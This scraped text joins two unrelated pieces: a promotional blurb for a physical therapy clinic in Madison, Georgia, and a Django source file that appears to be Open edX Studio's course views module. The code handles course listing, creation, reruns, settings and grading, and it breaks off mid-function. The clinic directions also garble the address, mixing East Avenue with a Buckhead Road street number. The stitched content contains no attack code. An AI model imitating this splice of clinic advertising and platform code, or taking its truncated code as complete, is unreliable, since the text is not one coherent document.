The Madison, GA East Athens Physical Therapy clinic was established in 2003. This clinic features a 6400 sq. ft. free standing building with abundant parking. Our 3000 sq. ft. running/plyometric space allows us to rehab local athletes and post op patients to the fullest potential. The Madison GA clinic supports and serves the Morgan County High School population.
Our convenient location on East Avenue across from the Aquatics Center and Morgan County Primary School allows us to serve the physical therapy needs of numerous towns and cities near Madison, GA. If you live in or around Madison, GA, Rutledge, GA, Bostwick, GA, Appalachee, GA, Buckhead, GA, Good Hope, GA, Social Circle, GA, Mansfield, GA, Newborn, GA, Eatonton, GA, or Covington, GA, contact us to schedule an appointment today.
From Athens: Take 441 south, take a right on East Avenue, East Athens Physical Therapy and 1541 Buckhead Road is a 1/4 of a mile up on the left across from the elementary school parking lot.
|
"""
Views related to operations on course objects
"""
from django.shortcuts import redirect
import json
import random
import string # pylint: disable=deprecated-module
import logging
from django.utils.translation import ugettext as _
import django.utils
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.views.decorators.http import require_http_methods, require_GET
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseNotFound, HttpResponse, Http404
from util.json_request import JsonResponse, JsonResponseBadRequest
from util.date_utils import get_default_time_display
from util.db import generate_int_id, MYSQL_MAX_INT
from edxmako.shortcuts import render_to_response
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.courseware_index import CoursewareSearchIndexer, SearchIndexingError
from xmodule.contentstore.content import StaticContent
from xmodule.tabs import PDFTextbookTabs
from xmodule.partitions.partitions import UserPartition
from xmodule.modulestore import EdxJSONEncoder
from xmodule.modulestore.exceptions import ItemNotFoundError, DuplicateCourseError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import Location
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.course_groups.partition_scheme import get_cohorted_user_partition
from django_future.csrf import ensure_csrf_cookie
from contentstore.course_info_model import get_course_updates, update_course_updates, delete_course_update
from contentstore.utils import (
add_instructor,
initialize_permissions,
get_lms_link_for_item,
add_extra_panel_tab,
remove_extra_panel_tab,
reverse_course_url,
reverse_library_url,
reverse_usage_url,
reverse_url,
remove_all_instructors,
)
from models.settings.course_details import CourseDetails, CourseSettingsEncoder
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from util.json_request import expect_json
from util.string_utils import _has_non_ascii_characters
from student.auth import has_studio_write_access, has_studio_read_access
from .component import (
OPEN_ENDED_COMPONENT_TYPES,
NOTE_COMPONENT_TYPES,
ADVANCED_COMPONENT_POLICY_KEY,
SPLIT_TEST_COMPONENT_TYPE,
ADVANCED_COMPONENT_TYPES,
)
from contentstore.tasks import rerun_course
from contentstore.views.entrance_exam import (
create_entrance_exam,
update_entrance_exam,
delete_entrance_exam
)
from .library import LIBRARIES_ENABLED
from .item import create_xblock_info
from course_creators.views import get_course_creator_status, add_user_with_status_unrequested
from contentstore import utils
from student.roles import (
CourseInstructorRole, CourseStaffRole, CourseCreatorRole, GlobalStaff, UserBasedRole
)
from student import auth
from course_action_state.models import CourseRerunState, CourseRerunUIStateManager
from course_action_state.managers import CourseActionStateItemNotFoundError
from microsite_configuration import microsite
from xmodule.course_module import CourseFields
from xmodule.split_test_module import get_split_user_partitions
from student.auth import has_course_author_access
from util.milestones_helpers import (
set_prerequisite_courses,
is_valid_course_key
)
MINIMUM_GROUP_ID = 100
RANDOM_SCHEME = "random"
COHORT_SCHEME = "cohort"
# Note: the following content group configuration strings are not
# translated since they are not visible to users.
CONTENT_GROUP_CONFIGURATION_DESCRIPTION = 'The groups in this configuration can be mapped to cohort groups in the LMS.'
CONTENT_GROUP_CONFIGURATION_NAME = 'Content Group Configuration'
__all__ = ['course_info_handler', 'course_handler', 'course_listing',
'course_info_update_handler', 'course_search_index_handler',
'course_rerun_handler',
'settings_handler',
'grading_handler',
'advanced_settings_handler',
'course_notifications_handler',
'textbooks_list_handler', 'textbooks_detail_handler',
'group_configurations_list_handler', 'group_configurations_detail_handler']
log = logging.getLogger(__name__)
class AccessListFallback(Exception):
"""
An exception that is raised whenever we need to `fall back` to fetching *all* courses
available to a user, rather than using a shorter method (i.e. fetching by group)
"""
pass
def get_course_and_check_access(course_key, user, depth=0):
"""
Internal method used to calculate and return the locator and course module
for the view functions in this file.
"""
if not has_studio_read_access(user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key, depth=depth)
return course_module
def reindex_course_and_check_access(course_key, user):
"""
Internal method used to restart indexing on a course.
"""
if not has_course_author_access(user, course_key):
raise PermissionDenied()
return CoursewareSearchIndexer.do_course_reindex(modulestore(), course_key)
@login_required
def course_notifications_handler(request, course_key_string=None, action_state_id=None):
"""
Handle incoming requests for notifications in a RESTful way.
course_key_string and action_state_id must both be set; else a HttpBadResponseRequest is returned.
For each of these operations, the requesting user must have access to the course;
else a PermissionDenied error is returned.
GET
json: return json representing information about the notification (action, state, etc)
DELETE
json: return json repressing success or failure of dismissal/deletion of the notification
PUT
Raises a NotImplementedError.
POST
Raises a NotImplementedError.
"""
# ensure that we have a course and an action state
if not course_key_string or not action_state_id:
return HttpResponseBadRequest()
response_format = request.REQUEST.get('format', 'html')
course_key = CourseKey.from_string(course_key_string)
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if not has_studio_write_access(request.user, course_key):
raise PermissionDenied()
if request.method == 'GET':
return _course_notifications_json_get(action_state_id)
elif request.method == 'DELETE':
# we assume any delete requests dismiss actions from the UI
return _dismiss_notification(request, action_state_id)
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'POST':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
else:
return HttpResponseNotFound()
def _course_notifications_json_get(course_action_state_id):
"""
Return the action and the action state for the given id
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
return HttpResponseBadRequest()
action_state_info = {
'action': action_state.action,
'state': action_state.state,
'should_display': action_state.should_display
}
return JsonResponse(action_state_info)
def _dismiss_notification(request, course_action_state_id): # pylint: disable=unused-argument
"""
Update the display of the course notification
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
# Can't dismiss a notification that doesn't exist in the first place
return HttpResponseBadRequest()
if action_state.state == CourseRerunUIStateManager.State.FAILED:
# We remove all permissions for this course key at this time, since
# no further access is required to a course that failed to be created.
remove_all_instructors(action_state.course_key)
# The CourseRerunState is no longer needed by the UI; delete
action_state.delete()
return JsonResponse({'success': True})
# pylint: disable=unused-argument
@login_required
def course_handler(request, course_key_string=None):
"""
The restful handler for course specific requests.
It provides the course tree with the necessary information for identifying and labeling the parts. The root
will typically be a 'course' object but may not be especially as we support modules.
GET
html: return course listing page if not given a course id
html: return html page overview for the given course if given a course id
json: return json representing the course branch's index entry as well as dag w/ all of the children
replaced w/ json docs where each doc has {'_id': , 'display_name': , 'children': }
POST
json: create a course, return resulting json
descriptor (same as in GET course/...). Leaving off /branch/draft would imply create the course w/ default
branches. Cannot change the structure contents ('_id', 'display_name', 'children') but can change the
index entry.
PUT
json: update this course (index entry not xblock) such as repointing head, changing display name, org,
course, run. Return same json as above.
DELETE
json: delete this branch from this course (leaving off /branch/draft would imply delete the course)
"""
try:
response_format = request.REQUEST.get('format', 'html')
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
return JsonResponse(_course_outline_json(request, course_module))
elif request.method == 'POST': # not sure if this is only post. If one will have ids, it goes after access
return _create_or_rerun_course(request)
elif not has_studio_write_access(request.user, CourseKey.from_string(course_key_string)):
raise PermissionDenied()
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'DELETE':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
elif request.method == 'GET': # assume html
if course_key_string is None:
return redirect(reverse("home"))
else:
return course_index(request, CourseKey.from_string(course_key_string))
else:
return HttpResponseNotFound()
except InvalidKeyError:
raise Http404
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_rerun_handler(request, course_key_string):
"""
The restful handler for course reruns.
GET
html: return html page with form to rerun a course for the given course id
"""
# Only global staff (PMs) are able to rerun courses during the soft launch
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=3)
if request.method == 'GET':
return render_to_response('course-create-rerun.html', {
'source_course_key': course_key,
'display_name': course_module.display_name,
'user': request.user,
'course_creator_status': _get_course_creator_status(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False)
})
@login_required
@ensure_csrf_cookie
@require_GET
def course_search_index_handler(request, course_key_string):
"""
The restful handler for course indexing.
GET
html: return status of indexing task
json: return status of indexing task
"""
# Only global staff (PMs) are able to index courses
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
content_type = request.META.get('CONTENT_TYPE', None)
if content_type is None:
content_type = "application/json; charset=utf-8"
with modulestore().bulk_operations(course_key):
try:
reindex_course_and_check_access(course_key, request.user)
except SearchIndexingError as search_err:
return HttpResponse(json.dumps({
"user_message": search_err.error_list
}), content_type=content_type, status=500)
return HttpResponse(json.dumps({
"user_message": _("Course has been successfully reindexed.")
}), content_type=content_type, status=200)
def _course_outline_json(request, course_module):
"""
Returns a JSON representation of the course module and recursively all of its children.
"""
return create_xblock_info(
course_module,
include_child_info=True,
course_outline=True,
include_children_predicate=lambda xblock: not xblock.category == 'vertical'
)
def _accessible_courses_list(request):
"""
List all courses available to the logged in user by iterating through all the courses
"""
def course_filter(course):
"""
Filter out unusable and inaccessible courses
"""
if isinstance(course, ErrorDescriptor):
return False
# pylint: disable=fixme
# TODO remove this condition when templates purged from db
if course.location.course == 'templates':
return False
return has_studio_read_access(request.user, course.id)
courses = filter(course_filter, modulestore().get_courses())
in_process_course_actions = [
course for course in
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED}, should_display=True
)
if has_studio_read_access(request.user, course.course_key)
]
return courses, in_process_course_actions
def _accessible_courses_list_from_groups(request):
"""
List all courses available to the logged in user by reversing access group names
"""
courses_list = {}
in_process_course_actions = []
instructor_courses = UserBasedRole(request.user, CourseInstructorRole.ROLE).courses_with_role()
staff_courses = UserBasedRole(request.user, CourseStaffRole.ROLE).courses_with_role()
all_courses = instructor_courses | staff_courses
for course_access in all_courses:
course_key = course_access.course_id
if course_key is None:
# If the course_access does not have a course_id, it's an org-based role, so we fall back
raise AccessListFallback
if course_key not in courses_list:
# check for any course action state for this course
in_process_course_actions.extend(
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED},
should_display=True,
course_key=course_key,
)
)
# check for the course itself
try:
course = modulestore().get_course(course_key)
except ItemNotFoundError:
# If a user has access to a course that doesn't exist, don't do anything with that course
pass
if course is not None and not isinstance(course, ErrorDescriptor):
# ignore deleted or errored courses
courses_list[course_key] = course
return courses_list.values(), in_process_course_actions
def _accessible_libraries_list(user):
"""
List all libraries available to the logged in user by iterating through all libraries
"""
# No need to worry about ErrorDescriptors - split's get_libraries() never returns them.
return [lib for lib in modulestore().get_libraries() if has_studio_read_access(user, lib.location.library_key)]
@login_required
@ensure_csrf_cookie
def course_listing(request):
"""
List all courses available to the logged in user
"""
courses, in_process_course_actions = get_courses_accessible_to_user(request)
libraries = _accessible_libraries_list(request.user) if LIBRARIES_ENABLED else []
def format_in_process_course_view(uca):
"""
Return a dict of the data which the view requires for each unsucceeded course
"""
return {
'display_name': uca.display_name,
'course_key': unicode(uca.course_key),
'org': uca.course_key.org,
'number': uca.course_key.course,
'run': uca.course_key.run,
'is_failed': True if uca.state == CourseRerunUIStateManager.State.FAILED else False,
'is_in_progress': True if uca.state == CourseRerunUIStateManager.State.IN_PROGRESS else False,
'dismiss_link': reverse_course_url(
'course_notifications_handler',
uca.course_key,
kwargs={
'action_state_id': uca.id,
},
) if uca.state == CourseRerunUIStateManager.State.FAILED else ''
}
def format_library_for_view(library):
"""
Return a dict of the data which the view requires for each library
"""
return {
'display_name': library.display_name,
'library_key': unicode(library.location.library_key),
'url': reverse_library_url('library_handler', unicode(library.location.library_key)),
'org': library.display_org_with_default,
'number': library.display_number_with_default,
'can_edit': has_studio_write_access(request.user, library.location.library_key),
}
courses = _remove_in_process_courses(courses, in_process_course_actions)
in_process_course_actions = [format_in_process_course_view(uca) for uca in in_process_course_actions]
return render_to_response('index.html', {
'courses': courses,
'in_process_course_actions': in_process_course_actions,
'libraries_enabled': LIBRARIES_ENABLED,
'libraries': [format_library_for_view(lib) for lib in libraries],
'user': request.user,
'request_course_creator_url': reverse('contentstore.views.request_course_creator'),
'course_creator_status': _get_course_creator_status(request.user),
'rerun_creator_status': GlobalStaff().has_user(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False),
'allow_course_reruns': settings.FEATURES.get('ALLOW_COURSE_RERUNS', True)
})
def _get_rerun_link_for_item(course_key):
""" Returns the rerun link for the given course key. """
return reverse_course_url('course_rerun_handler', course_key)
@login_required
@ensure_csrf_cookie
def course_index(request, course_key):
"""
Display an editable course overview.
org, course, name: Attributes of the Location for the item to edit
"""
# A depth of None implies the whole course. The course outline needs this in order to compute has_changes.
# A unit may not have a draft version, but one of its components could, and hence the unit itself has changes.
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
lms_link = get_lms_link_for_item(course_module.location)
reindex_link = None
if settings.FEATURES.get('ENABLE_COURSEWARE_INDEX', False):
reindex_link = "/course/{course_id}/search_reindex".format(course_id=unicode(course_key))
sections = course_module.get_children()
course_structure = _course_outline_json(request, course_module)
locator_to_show = request.REQUEST.get('show', None)
course_release_date = get_default_time_display(course_module.start) if course_module.start != DEFAULT_START_DATE else _("Unscheduled")
settings_url = reverse_course_url('settings_handler', course_key)
try:
current_action = CourseRerunState.objects.find_first(course_key=course_key, should_display=True)
except (ItemNotFoundError, CourseActionStateItemNotFoundError):
current_action = None
return render_to_response('course_outline.html', {
'context_course': course_module,
'lms_link': lms_link,
'sections': sections,
'course_structure': course_structure,
'initial_state': course_outline_initial_state(locator_to_show, course_structure) if locator_to_show else None,
'course_graders': json.dumps(
CourseGradingModel.fetch(course_key).graders
),
'rerun_notification_id': current_action.id if current_action else None,
'course_release_date': course_release_date,
'settings_url': settings_url,
'reindex_link': reindex_link,
'notification_dismiss_url': reverse_course_url(
'course_notifications_handler',
current_action.course_key,
kwargs={
'action_state_id': current_action.id,
},
) if current_action else None,
})
def get_courses_accessible_to_user(request):
"""
Try to get all courses by first reversing django groups and fallback to old method if it fails
Note: overhead of pymongo reads will increase if getting courses from django groups fails
"""
if GlobalStaff().has_user(request.user):
# user has global access so no need to get courses from django groups
courses, in_process_course_actions = _accessible_courses_list(request)
else:
try:
courses, in_process_course_actions = _accessible_courses_list_from_groups(request)
except AccessListFallback:
# user have some old groups or there was some error getting courses from django groups
# so fallback to iterating through all courses
courses, in_process_course_actions = _accessible_courses_list(request)
return courses, in_process_course_actions
def _remove_in_process_courses(courses, in_process_course_actions):
"""
removes any in-process courses in courses list. in-process actually refers to courses
that are in the process of being generated for re-run
"""
def format_course_for_view(course):
"""
Return a dict of the data which the view requires for each course
"""
return {
'display_name': course.display_name,
'course_key': unicode(course.location.course_key),
'url': reverse_course_url('course_handler', course.id),
'lms_link': get_lms_link_for_item(course.location),
'rerun_link': _get_rerun_link_for_item(course.id),
'org': course.display_org_with_default,
'number': course.display_number_with_default,
'run': course.location.run
}
in_process_action_course_keys = [uca.course_key for uca in in_process_course_actions]
courses = [
format_course_for_view(c)
for c in courses
if not isinstance(c, ErrorDescriptor) and (c.id not in in_process_action_course_keys)
]
return courses
def course_outline_initial_state(locator_to_show, course_structure):
"""
Returns the desired initial state for the course outline view. If the 'show' request parameter
was provided, then the view's initial state will be to have the desired item fully expanded
and to scroll to see the new item.
"""
def find_xblock_info(xblock_info, locator):
"""
Finds the xblock info for the specified locator.
"""
if xblock_info['id'] == locator:
return xblock_info
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
result = find_xblock_info(child_xblock_info, locator)
if result:
return result
return None
def collect_all_locators(locators, xblock_info):
"""
Collect all the locators for an xblock and its children.
"""
locators.append(xblock_info['id'])
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
collect_all_locators(locators, child_xblock_info)
selected_xblock_info = find_xblock_info(course_structure, locator_to_show)
if not selected_xblock_info:
return None
expanded_locators = []
collect_all_locators(expanded_locators, selected_xblock_info)
return {
'locator_to_show': locator_to_show,
'expanded_locators': expanded_locators
}
@expect_json
def _create_or_rerun_course(request):
"""
To be called by requests that create a new destination course (i.e., create_new_course and rerun_course)
Returns the destination course_key and overriding fields for the new course.
Raises DuplicateCourseError and InvalidKeyError
"""
if not auth.has_access(request.user, CourseCreatorRole()):
raise PermissionDenied()
try:
org = request.json.get('org')
course = request.json.get('number', request.json.get('course'))
display_name = request.json.get('display_name')
# force the start date for reruns and allow us to override start via the client
start = request.json.get('start', CourseFields.start.default)
run = request.json.get('run')
# allow/disable unicode characters in course_id according to settings
if not settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID'):
if _has_non_ascii_characters(org) or _has_non_ascii_characters(course) or _has_non_ascii_characters(run):
return JsonResponse(
{'error': _('Special characters not allowed in organization, course number, and course run.')},
status=400
)
fields = {'start': start}
if display_name is not None:
fields['display_name'] = display_name
if 'source_course_key' in request.json:
return _rerun_course(request, org, course, run, fields)
else:
return _create_new_course(request, org, course, run, fields)
except DuplicateCourseError:
return JsonResponse({
'ErrMsg': _(
'There is already a course defined with the same '
'organization and course number. Please '
'change either organization or course number to be unique.'
),
'OrgErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
'CourseErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
})
except InvalidKeyError as error:
return JsonResponse({
"ErrMsg": _("Unable to create course '{name}'.\n\n{err}").format(name=display_name, err=error.message)}
)
def _create_new_course(request, org, number, run, fields):
"""
Create a new course.
Returns the URL for the course overview page.
Raises DuplicateCourseError if the course already exists
"""
store_for_new_course = modulestore().default_modulestore.get_modulestore_type()
new_course = create_new_course_in_store(store_for_new_course, request.user, org, number, run, fields)
return JsonResponse({
'url': reverse_course_url('course_handler', new_course.id),
'course_key': unicode(new_course.id),
})
def create_new_course_in_store(store, user, org, number, run, fields):
"""
Create course in store w/ handling instructor enrollment, permissions, and defaulting the wiki slug.
Separated out b/c command line course creation uses this as well as the web interface.
"""
# Set a unique wiki_slug for newly created courses. To maintain active wiki_slugs for
# existing xml courses this cannot be changed in CourseDescriptor.
# # TODO get rid of defining wiki slug in this org/course/run specific way and reconcile
# w/ xmodule.course_module.CourseDescriptor.__init__
wiki_slug = u"{0}.{1}.{2}".format(org, number, run)
definition_data = {'wiki_slug': wiki_slug}
fields.update(definition_data)
with modulestore().default_store(store):
# Creating the course raises DuplicateCourseError if an existing course with this org/name is found
new_course = modulestore().create_course(
org,
number,
run,
user.id,
fields=fields,
)
# Make sure user has instructor and staff access to the new course
add_instructor(new_course.id, user, user)
# Initialize permissions for user in the new course
initialize_permissions(new_course.id, user)
return new_course
def _rerun_course(request, org, number, run, fields):
"""
Reruns an existing course.
Returns the URL for the course listing page.
"""
source_course_key = CourseKey.from_string(request.json.get('source_course_key'))
# verify user has access to the original course
if not has_studio_write_access(request.user, source_course_key):
raise PermissionDenied()
# create destination course key
store = modulestore()
with store.default_store('split'):
destination_course_key = store.make_course_key(org, number, run)
# verify org course and run don't already exist
if store.has_course(destination_course_key, ignore_case=True):
raise DuplicateCourseError(source_course_key, destination_course_key)
# Make sure user has instructor and staff access to the destination course
# so the user can see the updated status for that course
add_instructor(destination_course_key, request.user, request.user)
# Mark the action as initiated
CourseRerunState.objects.initiated(source_course_key, destination_course_key, request.user, fields['display_name'])
# Rerun the course as a new celery task
json_fields = json.dumps(fields, cls=EdxJSONEncoder)
rerun_course.delay(unicode(source_course_key), unicode(destination_course_key), request.user.id, json_fields)
# Return course listing page
return JsonResponse({
'url': reverse_url('course_handler'),
'destination_course_key': unicode(destination_course_key)
})
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_info_handler(request, course_key_string):
"""
GET
html: return html for editing the course info handouts and updates.
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
return render_to_response(
'course_info.html',
{
'context_course': course_module,
'updates_url': reverse_course_url('course_info_update_handler', course_key),
'handouts_locator': course_key.make_usage_key('course_info', 'handouts'),
'base_asset_url': StaticContent.get_base_url_path_for_course_assets(course_module.id)
}
)
else:
return HttpResponseBadRequest("Only supports html requests")
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def course_info_update_handler(request, course_key_string, provided_id=None):
"""
restful CRUD operations on course_info updates.
provided_id should be none if it's new (create) and index otherwise.
GET
json: return the course info update models
POST
json: create an update
PUT or DELETE
json: change an existing update
"""
if 'application/json' not in request.META.get('HTTP_ACCEPT', 'application/json'):
return HttpResponseBadRequest("Only supports json requests")
course_key = CourseKey.from_string(course_key_string)
usage_key = course_key.make_usage_key('course_info', 'updates')
if provided_id == '':
provided_id = None
# check that logged in user has permissions to this item (GET shouldn't require this level?)
if not has_studio_write_access(request.user, usage_key.course_key):
raise PermissionDenied()
if request.method == 'GET':
course_updates = get_course_updates(usage_key, provided_id, request.user.id)
if isinstance(course_updates, dict) and course_updates.get('error'):
return JsonResponse(course_updates, course_updates.get('status', 400))
else:
return JsonResponse(course_updates)
elif request.method == 'DELETE':
try:
return JsonResponse(delete_course_update(usage_key, request.json, provided_id, request.user))
except:
return HttpResponseBadRequest(
"Failed to delete",
content_type="text/plain"
)
# can be either and sometimes django is rewriting one to the other:
elif request.method in ('POST', 'PUT'):
try:
return JsonResponse(update_course_updates(usage_key, request.json, provided_id, request.user))
except:
return HttpResponseBadRequest(
"Failed to save",
content_type="text/plain"
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "PUT", "POST"))
@expect_json
def settings_handler(request, course_key_string):
"""
Course settings for dates and about pages
GET
html: get the page
json: get the CourseDetails model
PUT
json: update the Course and About xblocks through the CourseDetails model
"""
course_key = CourseKey.from_string(course_key_string)
prerequisite_course_enabled = settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES', False)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
upload_asset_url = reverse_course_url('assets_handler', course_key)
# see if the ORG of this course can be attributed to a 'Microsite'. In that case, the
# course about page should be editable in Studio
about_page_editable = not microsite.get_value_for_org(
course_module.location.org,
'ENABLE_MKTG_SITE',
settings.FEATURES.get('ENABLE_MKTG_SITE', False)
)
short_description_editable = settings.FEATURES.get('EDITABLE_SHORT_DESCRIPTION', True)
settings_context = {
'context_course': course_module,
'course_locator': course_key,
'lms_link_for_about_page': utils.get_lms_link_for_about_page(course_key),
'course_image_url': utils.course_image_url(course_module),
'details_url': reverse_course_url('settings_handler', course_key),
'about_page_editable': about_page_editable,
'short_description_editable': short_description_editable,
'upload_asset_url': upload_asset_url,
'course_handler_url': reverse_course_url('course_handler', course_key),
}
if prerequisite_course_enabled:
courses, in_process_course_actions = get_courses_accessible_to_user(request)
# exclude current course from the list of available courses
courses = [course for course in courses if course.id != course_key]
if courses:
courses = _remove_in_process_courses(courses, in_process_course_actions)
settings_context.update({'possible_pre_requisite_courses': courses})
return render_to_response('settings.html', settings_context)
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
course_details = CourseDetails.fetch(course_key)
return JsonResponse(
course_details,
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
# For every other possible method type submitted by the caller...
else:
# if pre-requisite course feature is enabled set pre-requisite course
if prerequisite_course_enabled:
prerequisite_course_keys = request.json.get('pre_requisite_courses', [])
if prerequisite_course_keys:
if not all(is_valid_course_key(course_key) for course_key in prerequisite_course_keys):
return JsonResponseBadRequest({"error": _("Invalid prerequisite course key")})
set_prerequisite_courses(course_key, prerequisite_course_keys)
# If the entrance exams feature has been enabled, we'll need to check for some
# feature-specific settings and handle them accordingly
# We have to be careful that we're only executing the following logic if we actually
# need to create or delete an entrance exam from the specified course
if settings.FEATURES.get('ENTRANCE_EXAMS', False):
course_entrance_exam_present = course_module.entrance_exam_enabled
entrance_exam_enabled = request.json.get('entrance_exam_enabled', '') == 'true'
ee_min_score_pct = request.json.get('entrance_exam_minimum_score_pct', None)
# If the entrance exam box on the settings screen has been checked...
if entrance_exam_enabled:
# Load the default minimum score threshold from settings, then try to override it
entrance_exam_minimum_score_pct = float(settings.ENTRANCE_EXAM_MIN_SCORE_PCT)
if ee_min_score_pct:
entrance_exam_minimum_score_pct = float(ee_min_score_pct)
if entrance_exam_minimum_score_pct.is_integer():
entrance_exam_minimum_score_pct = entrance_exam_minimum_score_pct / 100
entrance_exam_minimum_score_pct = unicode(entrance_exam_minimum_score_pct)
# If there's already an entrance exam defined, we'll update the existing one
if course_entrance_exam_present:
exam_data = {
'entrance_exam_minimum_score_pct': entrance_exam_minimum_score_pct
}
update_entrance_exam(request, course_key, exam_data)
# If there's no entrance exam defined, we'll create a new one
else:
create_entrance_exam(request, course_key, entrance_exam_minimum_score_pct)
# If the entrance exam box on the settings screen has been unchecked,
# and the course has an entrance exam attached...
elif not entrance_exam_enabled and course_entrance_exam_present:
delete_entrance_exam(request, course_key)
# Perform the normal update workflow for the CourseDetails model
return JsonResponse(
CourseDetails.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def grading_handler(request, course_key_string, grader_index=None):
"""
Course Grading policy configuration
GET
html: get the page
json no grader_index: get the CourseGrading model (graceperiod, cutoffs, and graders)
json w/ grader_index: get the specific grader
PUT
json no grader_index: update the Course through the CourseGrading model
json w/ grader_index: create or update the specific grader (create if index out of range)
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
course_details = CourseGradingModel.fetch(course_key)
return render_to_response('settings_graders.html', {
'context_course': course_module,
'course_locator': course_key,
'course_details': json.dumps(course_details, cls=CourseSettingsEncoder),
'grading_url': reverse_course_url('grading_handler', course_key),
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
if grader_index is None:
return JsonResponse(
CourseGradingModel.fetch(course_key),
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(CourseGradingModel.fetch_grader(course_key, grader_index))
elif request.method in ('POST', 'PUT'): # post or put, doesn't matter.
# None implies update the whole model (cutoffs, graceperiod, and graders) not a specific grader
if grader_index is None:
return JsonResponse(
CourseGradingModel.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(
CourseGradingModel.update_grader_from_json(course_key, request.json, request.user)
)
elif request.method == "DELETE" and grader_index is not None:
CourseGradingModel.delete_grader(course_key, grader_index, request.user)
return JsonResponse()
# pylint: disable=invalid-name
def _add_tab(request, tab_type, course_module):
"""
Adds tab to the course.
"""
# Add tab to the course if needed
changed, new_tabs = add_extra_panel_tab(tab_type, course_module)
# If a tab has been added to the course, then send the
# metadata along to CourseMetadata.update_from_json
if changed:
course_module.tabs = new_tabs
request.json.update({'tabs': {'value': new_tabs}})
# Indicate that tabs should not be filtered out of
# the metadata
return True
return False
# pylint: disable=invalid-name
def _remove_tab(request, tab_type, course_module):
"""
Removes the tab from the course.
"""
changed, new_tabs = remove_extra_panel_tab(tab_type, course_module)
if changed:
course_module.tabs = new_tabs
request.json.update({'tabs': {'value': new_tabs}})
return True
return False
def is_advanced_component_present(request, advanced_components):
"""
Return True when one of `advanced_components` is present in the request.
raises TypeError
when request.ADVANCED_COMPONENT_POLICY_KEY is malformed (not iterable)
"""
if ADVANCED_COMPONENT_POLICY_KEY not in request.json:
return False
new_advanced_component_list = request.json[ADVANCED_COMPONENT_POLICY_KEY]['value']
for ac_type in advanced_components:
if ac_type in new_advanced_component_list and ac_type in ADVANCED_COMPONENT_TYPES:
return True
def is_field_value_true(request, field_list):
"""
Return True when one of field values is set to True by request
"""
return any([request.json.get(field, {}).get('value') for field in field_list])
# pylint: disable=invalid-name
def _modify_tabs_to_components(request, course_module):
"""
Automatically adds/removes tabs if user indicated that they want
respective modules enabled in the course
Return True when tab configuration has been modified.
"""
tab_component_map = {
# 'tab_type': (check_function, list_of_checked_components_or_values),
# open ended tab by combinedopendended or peergrading module
'open_ended': (is_advanced_component_present, OPEN_ENDED_COMPONENT_TYPES),
# notes tab
'notes': (is_advanced_component_present, NOTE_COMPONENT_TYPES),
# student notes tab
'edxnotes': (is_field_value_true, ['edxnotes'])
}
tabs_changed = False
for tab_type in tab_component_map.keys():
check, component_types = tab_component_map[tab_type]
try:
tab_enabled = check(request, component_types)
except TypeError:
